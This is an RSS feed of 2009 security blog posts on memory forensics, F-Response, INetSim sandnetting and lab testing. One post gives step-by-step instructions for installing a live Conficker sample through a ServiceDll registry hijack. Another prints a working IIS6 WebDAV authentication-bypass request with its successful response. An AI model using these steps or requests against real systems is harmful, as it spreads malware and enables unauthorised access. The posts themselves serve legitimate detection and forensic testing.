<item><title>Cold Boot Memory Attack on TV Show "My Own Worst Enemy"</title><description>Secuobs.com : 2009-11-05 14:57:36 - John H. Sawyer - I'm checking out the new series "My Own Worst Enemy" with Christian Slater. In episode two, around the 40 minute mark, they are being briefed on how they are going to infiltrate the enemy's headquarters. Someone mentions that the computers will be encrypted and a geeky dude says no problem, this can right here will freeze the memory so you can extract the encryption keys. Amazing! When they get in, one of the guys is seen opening the side of a computer, briefly spraying the can into the machine, pulling out a RAM chip with tweezers and putting it into some sort of small circuit board that is then analyzed by a small subnotebook. Pretty cool stuff. I'm very impressed, at least after seeing all the technological crap the show "24" has butchered.</description><link>http://www.secuobs.com/revue/news/157761.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/157761.shtml</guid></item>
<item><title>Encase, Physical Memory and E01s</title><description>Secuobs.com : 2009-11-05 14:57:36 - John H. Sawyer - Short disclaimer: This post is primarily for the sake of posterity and keeping track of some of the stuff I had laying around to get where I am in the research I'm doing right now. I've done a lot more testing with physical memory acquisition using winen, mdd, win32dd, and Encase, both locally on live systems and on remote systems using F-Response, in an effort to see the compatibility of the different outputs with Encase memory analysis EnScripts, the Volatility Framework and Memoryze. I don't remember which version of Encase added physical and process memory support, but it was the 6.11 release that included winen.exe, a standalone utility to create an image dump of physical memory. The resulting file was, of course, in the EWF (E01) format. The interesting thing is that when E01s containing memory are opened in Encase, it knows that they represent memory, so the icon in Encase changes from the usual hard drive icon to a memory chip. Here's a screenshot. How does Encase know? I thought it was based on the following dialog and I'd be able to change this within Encase by right-clicking on an entry, but modifying the entries like those in the following image did nothing. It turns out that Guidance Software has made an addition to the E01 file so that there is a new media type identifier, 0x10. Taking a look at a memory image created by winen, ewfinfo from the libewf project shows the Media Type as RAM:
ewfinfo 20080609 (libewf 20080609, zlib 1.2.3, libcrypto 0.9.7)
Acquiry information
  Case number: AAAAAAAAAAAA
  Description: winen-nocomp
  Examiner name: BBBBBBBBBBBB
  Evidence number: CCCCCCCCCCCC
  Operating system used: Windows XP
  Software version used: 6.11
  Password: N/A
  Unknown value ext: 0
Media information
  Media type: RAM
  Media is physical: yes
  Amount of sectors: 130940
  Bytes per sector: 4096
  Media size: 511 MiB (536330240 bytes)
  Error granularity: 1
  Compression type: no compression
  GUID: 837687b1-988d-2c44-a8f4-84874692842a
  MD5 hash in file: 26b6d584f7289baeecb64a79adc6f60b
Note: Later beta versions since 20080609 lost the LIBEWF_MEDIA_TYPE_RAM, so they show up like this:
ewfinfo 20081013 (libewf 20081013, libuna 20081011, zlib 1.2.3, libcrypto 0.9.7)
Acquiry information
  Case number: AAAAAAAAAAAA
  Description: winen-nocomp
  Examiner name: BBBBBBBBBBBB
  Evidence number: CCCCCCCCCCCC
  Operating system used: Windows XP
  Software version used: 6.11
  Password: N/A
  Unknown value ext: 0
Media information
  Media type: unknown (0x10)
  Media is physical: yes
  Amount of sectors: 130940
  Bytes per sector: 4096
  Media size: 511 MiB (536330240 bytes)
  Error granularity: 1
  Compression type: no compression
  GUID: 837687b1-988d-2c44-a8f4-84874692842a
  MD5 hash in file: 26b6d584f7289baeecb64a79adc6f60b
Winen is great for incident response and gathering memory from live systems, but you can also access physical memory and individual processes on the same machine you're running Encase on; it's as easy as clicking the related boxes on the "Add Device" dialog in Encase. Documentation on the EWF (E01) File Format.</description><link>http://www.secuobs.com/revue/news/157760.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/157760.shtml</guid></item>
<item><title>iPod Touch</title><description>Secuobs.com : 2009-11-05 14:57:36 - John H. Sawyer - I've had my new iPod for a week now and am loving it. Email is great, and now I'm testing out a blogging app that seems to work well so far. My favorite app so far is ByLine, which syncs my Google Reader RSS feeds so I can read them offline, making it easy to stay on top of them. Ok, test over. More cool memory forensic stuff to come.</description><link>http://www.secuobs.com/revue/news/157759.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/157759.shtml</guid></item>
<item><title>Mini Wish List</title><description>Secuobs.com : 2009-11-05 14:57:36 - John H. Sawyer - Here's a quick wish list for anyone who is still stumped on what to get me. I did put down gift certificates for two of the sites, but that's because it would be impossible to list all the little items from each site I'm interested in, like a Super TV-B-Gone kit, DIY Design Electronics Kit, Mousebot Kit, Blinkybug Kit, Tiny Cylon Kit, USB7 6 Digit LED Display Kit, Solarspeeder Kit, Learn to Solder Kit, Maker Bundle #1, Bare Bones Arduino Board Kit. Subscription to MAKE Magazine ($34.95); Wizzywig Volume 1 (PHREAK); Wizzywig Volume 2 (HACKER); Gift Certificate to MakerSHED; Gift Certificate to adafruit industries.</description><link>http://www.secuobs.com/revue/news/157758.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/157758.shtml</guid></item>
<item><title>Weaponizing USB Flash Drives with the Addonics NAS Adapter</title><description>Secuobs.com : 2009-11-05 14:57:36 - John H. Sawyer - It's kind of interesting how I start out to write something and it ends up being totally different from what I was planning. Today's post at Dark Reading was like that. My original intent was to focus on data sprawl due to the proliferation of physically small, large storage capacity flash drives. What I ended up with was a bad ass idea of weaponizing the Addonics NAS Adapter into a MitM attack tool for scarfing up network data, including VoIP calls. Take a trip down the rabbit hole with "USB Flash Drive Network Weaponization". BTW, here's a link to the PDF of Larry Pesce's "Rogue APs for Penetration Testers" presentation. He's my inspiration for hiding small electronic devices in obscure places.</description><link>http://www.secuobs.com/revue/news/157757.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/157757.shtml</guid></item>
<item><title>Windows Physical Memory Roundup</title><description>Secuobs.com : 2009-11-05 14:57:36 - John H. Sawyer - I put together a comprehensive list of Windows physical memory tools that's posted over at the SANS Computer Forensics Blog. The list includes acquisition and analysis tools along with a brief description, whether it is free or commercial, and screenshots if available. Take a look if you have an interest in Windows memory analysis: "Windows Physical Memory: Finding the Right Tool for the Job".</description><link>http://www.secuobs.com/revue/news/157756.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/157756.shtml</guid></item>
<item><title>Go Infect Yourself with Conficker</title><description>Secuobs.com : 2009-11-05 14:57:36 - John H. Sawyer - I'd been wanting to do some testing with Conficker to see if my IDS rules were truly working and whether or not some of the new detection tools released Monday were accurate (DarkReading: "Conficker Detection: Let Me Count The Ways"). Knowing that just running an EXE wasn't all that easy, based on some of the analysis from the Internet Storm Center (here and here), I started digging around for some good samples of Conficker and instructions. First, I grabbed a few samples from Offensive Computing's malware archive. Next, I went looking for some hints on the best way to load the samples and found a related thread on Offensive Computing where someone was looking for a Conficker.C sample. So, here's the quick and dirty. We'll download the sample, rename it, copy it to the system32 dir and edit a useless service to load it on startup. 1. Grab the file here. 2. Rename it to "booyah.dll". 3. Copy "booyah.dll" to "C:\Windows\System32". 4. Open Regedit and navigate to "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Nla\Parameters". 5. Right click on "ServiceDll", click "Modify", change the current DLL to point to "booyah.dll", and click OK. 6. Close Regedit and reboot. Now, your machine is infected. To verify, go to some sites like McAfee and SecureWorks that are blocked, or try out the Conficker Eye Chart. What's next? If you've done malware analysis before, you know you should have been capturing ALL network traffic from this host. Continue sniffing and looking for interesting things. Capture all of the traffic to disk with tcpdump, tshark or daemonlogger. Then run it through Snort with the Emerging Threats ruleset, or ngrep looking for interesting strings. The possibilities are endless. Oh yeah, don't forget to put this behind some kind of firewall or filtering device so you can keep a handle on it. I've got mine sitting behind a Vyatta-based bridging firewall that is working quite well for this use. I'm also sniffing directly on the bridged interface.</description><link>http://www.secuobs.com/revue/news/157755.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/157755.shtml</guid></item>
<item><title>F-Response 3.09 Trial Run &amp; Screenshots</title><description>Secuobs.com : 2009-11-05 14:57:36 - John H. Sawyer - On Tuesday, I received a package in the mail from Matt Shannon, founder and creator of F-Response. Inside was a small, F-Response-branded USB thumb drive containing the upcoming release of F-Response, due out April 15, 2009. I updated my dongle, installed the new license manager and was ready to begin testing. One of the first things I noticed is the newly redesigned license manager to replace the NetUnikey Server. Thank you, thank you, thank you. The third-party NetUnikey Server for dongle authentication in previous releases sucked, and I even ran into some bizarre network issues where it wouldn't authenticate in version 1.18 but was fine in the 2.x betas. Now, that's all fixed and working great. For those of you unfamiliar with the product, there is a licensing dongle. In the Field Kit edition, it has to be plugged into the host you are examining. In the Consultant and Enterprise editions, the dongle can be plugged into the analyst's workstation. When the F-Response client runs on the host being analyzed, it first must authenticate to the workstation with the dongle in it. It was the NetUnikey Server that used to accept and authenticate the requests from the F-Response clients. Now, it's gone and the F-Response License Manager serves that purpose in version 3.09. The next major feature addition is the inclusion of the new management interfaces in the Enterprise and Consultant editions. They make deployment and connecting to remote disks a piece of cake. The Enterprise Management Console allows you to push the F-Response enterprise service to hosts you have admin rights to, start the service and connect to the disks and memory. The Consultant Connector makes it easy to connect to disks from hosts on which the Consultant F-Response client is running. There are several videos over at the F-Response site if you want to see them in action (linked to by their names above). The Enterprise Management Console will definitely be a head turner for companies who have been looking to replace products like Encase Enterprise but weren't sure if F-Response was the solution. It's about time to take another look if you're one of those groups. For me, the most exciting new features were the inclusion of support for Mac OS X and Linux in the Enterprise and Consultant versions. Previously, support for those OS's was only on the Field Kit edition. So far, F-Response has been working flawlessly on Mac and Linux. Earlier this week, I witnessed two Mac OS X machines have their entire 200 GB hard drives imaged over the network with F-Response. I personally tested a MacBook Pro with the latest version of OS X, a fully updated Ubuntu Linux system and a Windows XP SP3 system. In this screenshot, you can see the different options available in the Mac OS X client. I created an autoconfigure (.ini) file using the Windows F-Response client, which has a GUI interface where you enter the IP of the host with the dongle and the user credentials to connect back into the machine over iSCSI. As you can see in this screenshot, I ran the executable with the "-c" option followed by the autoconfigure file I had created from the Windows client. The F-Response client authenticated, mounted the available drives and started listening for connections via iSCSI. Did you notice how there were two drives in the last screenshot that were mounted read-only? What's worth noting is that this is my MacBook Pro, which only has one hard drive. I use FileVault for encrypting my Home directory. The second drive is my Home directory mounted. I know one of the big features in Windows was the ability to access disk Volumes and not just raw hard drives, but I was surprised to see this behavior. I haven't tested imaging the mounted Home directory via F-Response yet, but it should be interesting. This next screenshot is of the Linux F-Response client. It's pretty much identical to the Mac version and works with the same autoconfigure file as both Windows and Linux. This is a great feature, allowing you to create CDs to hand out to your help desk with all versions of the client and only one .ini. This next screenshot is FTK Imager connected to a Linux host. While I was testing, I only looked around the filesystem a bit, but I could have easily imaged the drive. I think one of the things I like about F-Response the most is the flexibility it gives me to use pretty much any forensic tool I want, whether it's FTK, Encase, RegRipper or anything else. It really lives up to its slogan by extending your arsenal.</description><link>http://www.secuobs.com/revue/news/157754.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/157754.shtml</guid></item>
<item><title>Log Results of Successful IIS6 WebDAV Zero Day Attacks</title><description>Secuobs.com : 2009-11-05 14:57:36 - John H. Sawyer - I covered this a bit in my DarkReading blog but wanted to continue with my testing tonight to see what else I could find out. Plus, there are some new tool updates, such as an auxiliary module for Metasploit and a plugin for Nessus. There was an interesting follow-up to the DR blog on whether or not Microsoft Outlook Web Access was vulnerable. I don't have hands-on access to an OWA box, but I hope to do some more testing on Tues. What prompted me to write this post was an interesting finding posed in the correspondence regarding the logs and why the Unicode isn't showing up. The reader was wondering why the Unicode attacks were not showing up. Let's start first with some example logs, right after what my telnet test looks like, followed by my speculation as to the answer. metasploit:jsawyer$ telnet 192.168.43.128 80; Trying 192.168.43.128...; Connected to 192.168.43.128.; Escape character is '^]'.; GET /%c0%af/admin/test.txt HTTP/1.1; Translate: f; Connection: close; Host: 192.168.43.128; HTTP/1.1 200 OK; Connection: close; Date: Tue, 19 May 2009 04:42:20 GMT; Server: Microsoft-IIS/6.0; Content-Type: text/plain; Content-Length: 7; ETag: "ffbac9af6d7c91:1e1"; Last-Modified: Mon, 18 May 2009 20:20:09 GMT; Accept-Ranges: bytes; pwnage. (Telnet success) 2009-05-19 04:42:20 W3SVC1 192.168.43.128 GET /admin/test.txt - 80 - 192.168.43.1 - 200 0 0. (Metasploit finding the protected admin dir) 2009-05-19 04:33:12 W3SVC1 192.168.43.128 PROPFIND /admin/ - 80 - 192.168.43.1 - 401 2 2148074254; 2009-05-19 04:33:13 W3SVC1 192.168.43.128 PROPFIND /admin/ - 80 - 192.168.43.1 - 207 0 0. As you can see in the successful telnet log entry above, the %c0%af is removed. I suspect the issue is due to how the WebDAV DLL is handling the request and that the logging occurs after the request is handled. It would make sense, since the log has to accurately reflect the proper HTTP code. In this case,
the vulnerable WebDAV function removes the Unicode, responds with the requested file, and IIS then logs the request. That's all I've got for now. It's nearing 2am and I'm starting to wane. Yeah, can't sleep, so here's some logs on an Apache server from a Nessus scan with the new plugin. I'll test it against an IIS server in the morning.</description><link>http://www.secuobs.com/revue/news/157753.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/157753.shtml</guid></item>
<item><title>Sandnetting With INetSim &amp; Metasploit</title><description>Secuobs.com : 2009-11-05 14:57:36 - John H. Sawyer - I've been looking for something that might work well in a situation where I might want to redirect malicious domains to an IP hosting numerous faux services. I've used the scripts from TRUMAN in the past, but they've left a little to be desired (no reflection on Joe Stewart, the guy rocks). I looked at Glastopf, but it wasn't what I was looking for. I caught a reference to INetSim and it looked to be exactly what I wanted. INetSim emulates about a dozen different services and can do cool things like serve up pretty much any file that is requested. For example, if a Zeus bot-infected host is looking for a new cfg file, it will respond with a file. Now, it's not the right file, but it doesn't return a 404, either. The significant thing here is that it records all requests and can emulate the services well. Check the features page for more info. Using VMware Fusion 3, I set up a Ubuntu 9.10 Server for my testing. The following apt-get command installed the necessary pre-requisites: sudo apt-get install libnet-server-perl libnet-dns-perl libdigest-sha1-perl libiptables-ipv4-ipqueue-perl libipc-shareable-perl. I made a few small changes to the config file to fit my environment and was ready to go. Running "sudo ./inetsim" gets the following: INetSim 1.1.1 (2009-09-09) by Matthias Eckert &amp; Thomas Hungenberg. Using log directory: /home/jsawyer/downloads/inetsim-1.1.1/log/; Using data directory: /home/jsawyer/downloads/inetsim-1.1.1/data/; Using report directory: /home/jsawyer/downloads/inetsim-1.1.1/report/; Using configuration file: /home/jsawyer/downloads/inetsim-1.1.1/conf/inetsim.conf; Parsing configuration file. Configuration file parsed successfully. INetSim main process started (PID 10323). Session ID is: 10323. Real Date/Time is: Tue Nov 3 22:02:21 2009. Fake Date/Time is: Tue Nov 3 22:02:21 2009 (Delta: 0 seconds). Forking services: dns 53/udp/tcp - started (PID 10325); http 80/tcp - started (PID 10326); pop3 110/tcp - started (PID 10328); smtp 25/tcp - started (PID 10327); tftp 69/udp - started (PID 10329); ntp 123/udp - started (PID 10331); time 37/tcp - started (PID 10332); ftp 21/tcp - started (PID 10330); daytime 13/tcp - started (PID 10334); time 37/udp - started (PID 10333); echo 7/tcp - started (PID 10336); echo 7/udp - started (PID 10337); daytime 13/udp - started (PID 10335); discard 9/tcp - started (PID 10338); discard 9/udp - started (PID 10339); quotd 17/tcp - started (PID 10340); quotd 17/udp - started (PID 10341); chargen 19/tcp - started (PID 10342); finger 79/tcp - started (PID 10344); chargen 19/udp - started (PID 10343); syslog 514/udp - started (PID 10346); ident 113/tcp - started (PID 10345); dummy 1/tcp - started (PID 10347); dummy 1/udp - started (PID 10348); done. Simulation running. As you can see, setup is easy. Now, how do you get the bad guys to end up at INetSim? I mentioned redirection of malicious domains earlier, but from the sandnet perspective, we can do a couple of things. The DNS dummy service within INetSim can be configured to return the same IP for all queries by configuring dns_default_ip. But, that's too easy. Things are more fun when you use the Metasploit Framework. We could run msfconsole from either the same host or another host and have it respond to all DNS queries with the address of the host running INetSim. First, create a file and call it anything (like fakedns.rc). In fakedns.rc, you need the following: use auxiliary/server/fakedns; set TARGETHOST 10.227.212.231; set SRVPORT 53; run. Then, run Metasploit like this: sudo ./msfconsole -r fakedns.rc. And, there you go. Like I said, you could use the dummy DNS within INetSim, but I just felt like scripting it with Metasploit since I'd done a few custom configs lately for wireless hijacking demos. While I've got them in front of me, here's an example of the logs of DNS queries against INetSim: Report for session '10413'. Real start date: Tue Nov 3 22:10:15 2009. Simulated start date: Tue Nov 3 22:10:15 2009. Time difference on startup: none. 2009-11-03 at 22:10:44: First simulated date in log file. 2009-11-03 at 22:10:44: DNS connection, type: A, class: IN, requested name: www.bob.com. 2009-11-03 at 22:10:51: DNS connection, type: A, class: IN, requested name: www.b0b.com. 2009-11-03 at 22:10:51: Last simulated date in log file. I mentioned above that INetSim can answer pretty much any request. It responds based on the extension of the file being requested. You request a JPG, it gives you back a JPG. This is all defined in the config. I'd recommend changing out the default files for something unique so that a malware author couldn't fingerprint your host as running INetSim because of the sample files: http_fakefile txt sample.txt text/plain; http_fakefile htm sample.html text/html; http_fakefile html sample.html text/html; http_fakefile php sample.html text/html; http_fakefile gif sample.gif image/gif; http_fakefile jpg sample.jpg image/jpeg; http_fakefile jpeg sample.jpg image/jpeg; http_fakefile png sample.png image/png; http_fakefile bmp sample.bmp image/x-ms-bmp; http_fakefile ico favicon.ico image/x-icon; http_fakefile exe sample_gui.exe x-msdos-program; http_fakefile com sample_gui.exe x-msdos-program. Here's a couple of requests via curl showing that a JPG is being served up no matter the path requested: jsawyer$ curl -s http://10.227.212.231/suk.jpg | hexdump -C | head -1 gives 00000000 ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 |......JFIF.....H|, and jsawyer$ curl -s http://10.227.212.231/OMG/longURL/whereisitgoing/sukeyake.jpg | hexdump -C | head -1 gives 00000000 ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 |......JFIF.....H|. Have fun.</description><link>http://www.secuobs.com/revue/news/157752.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/157752.shtml</guid></item>
</channel>
</rss>
 
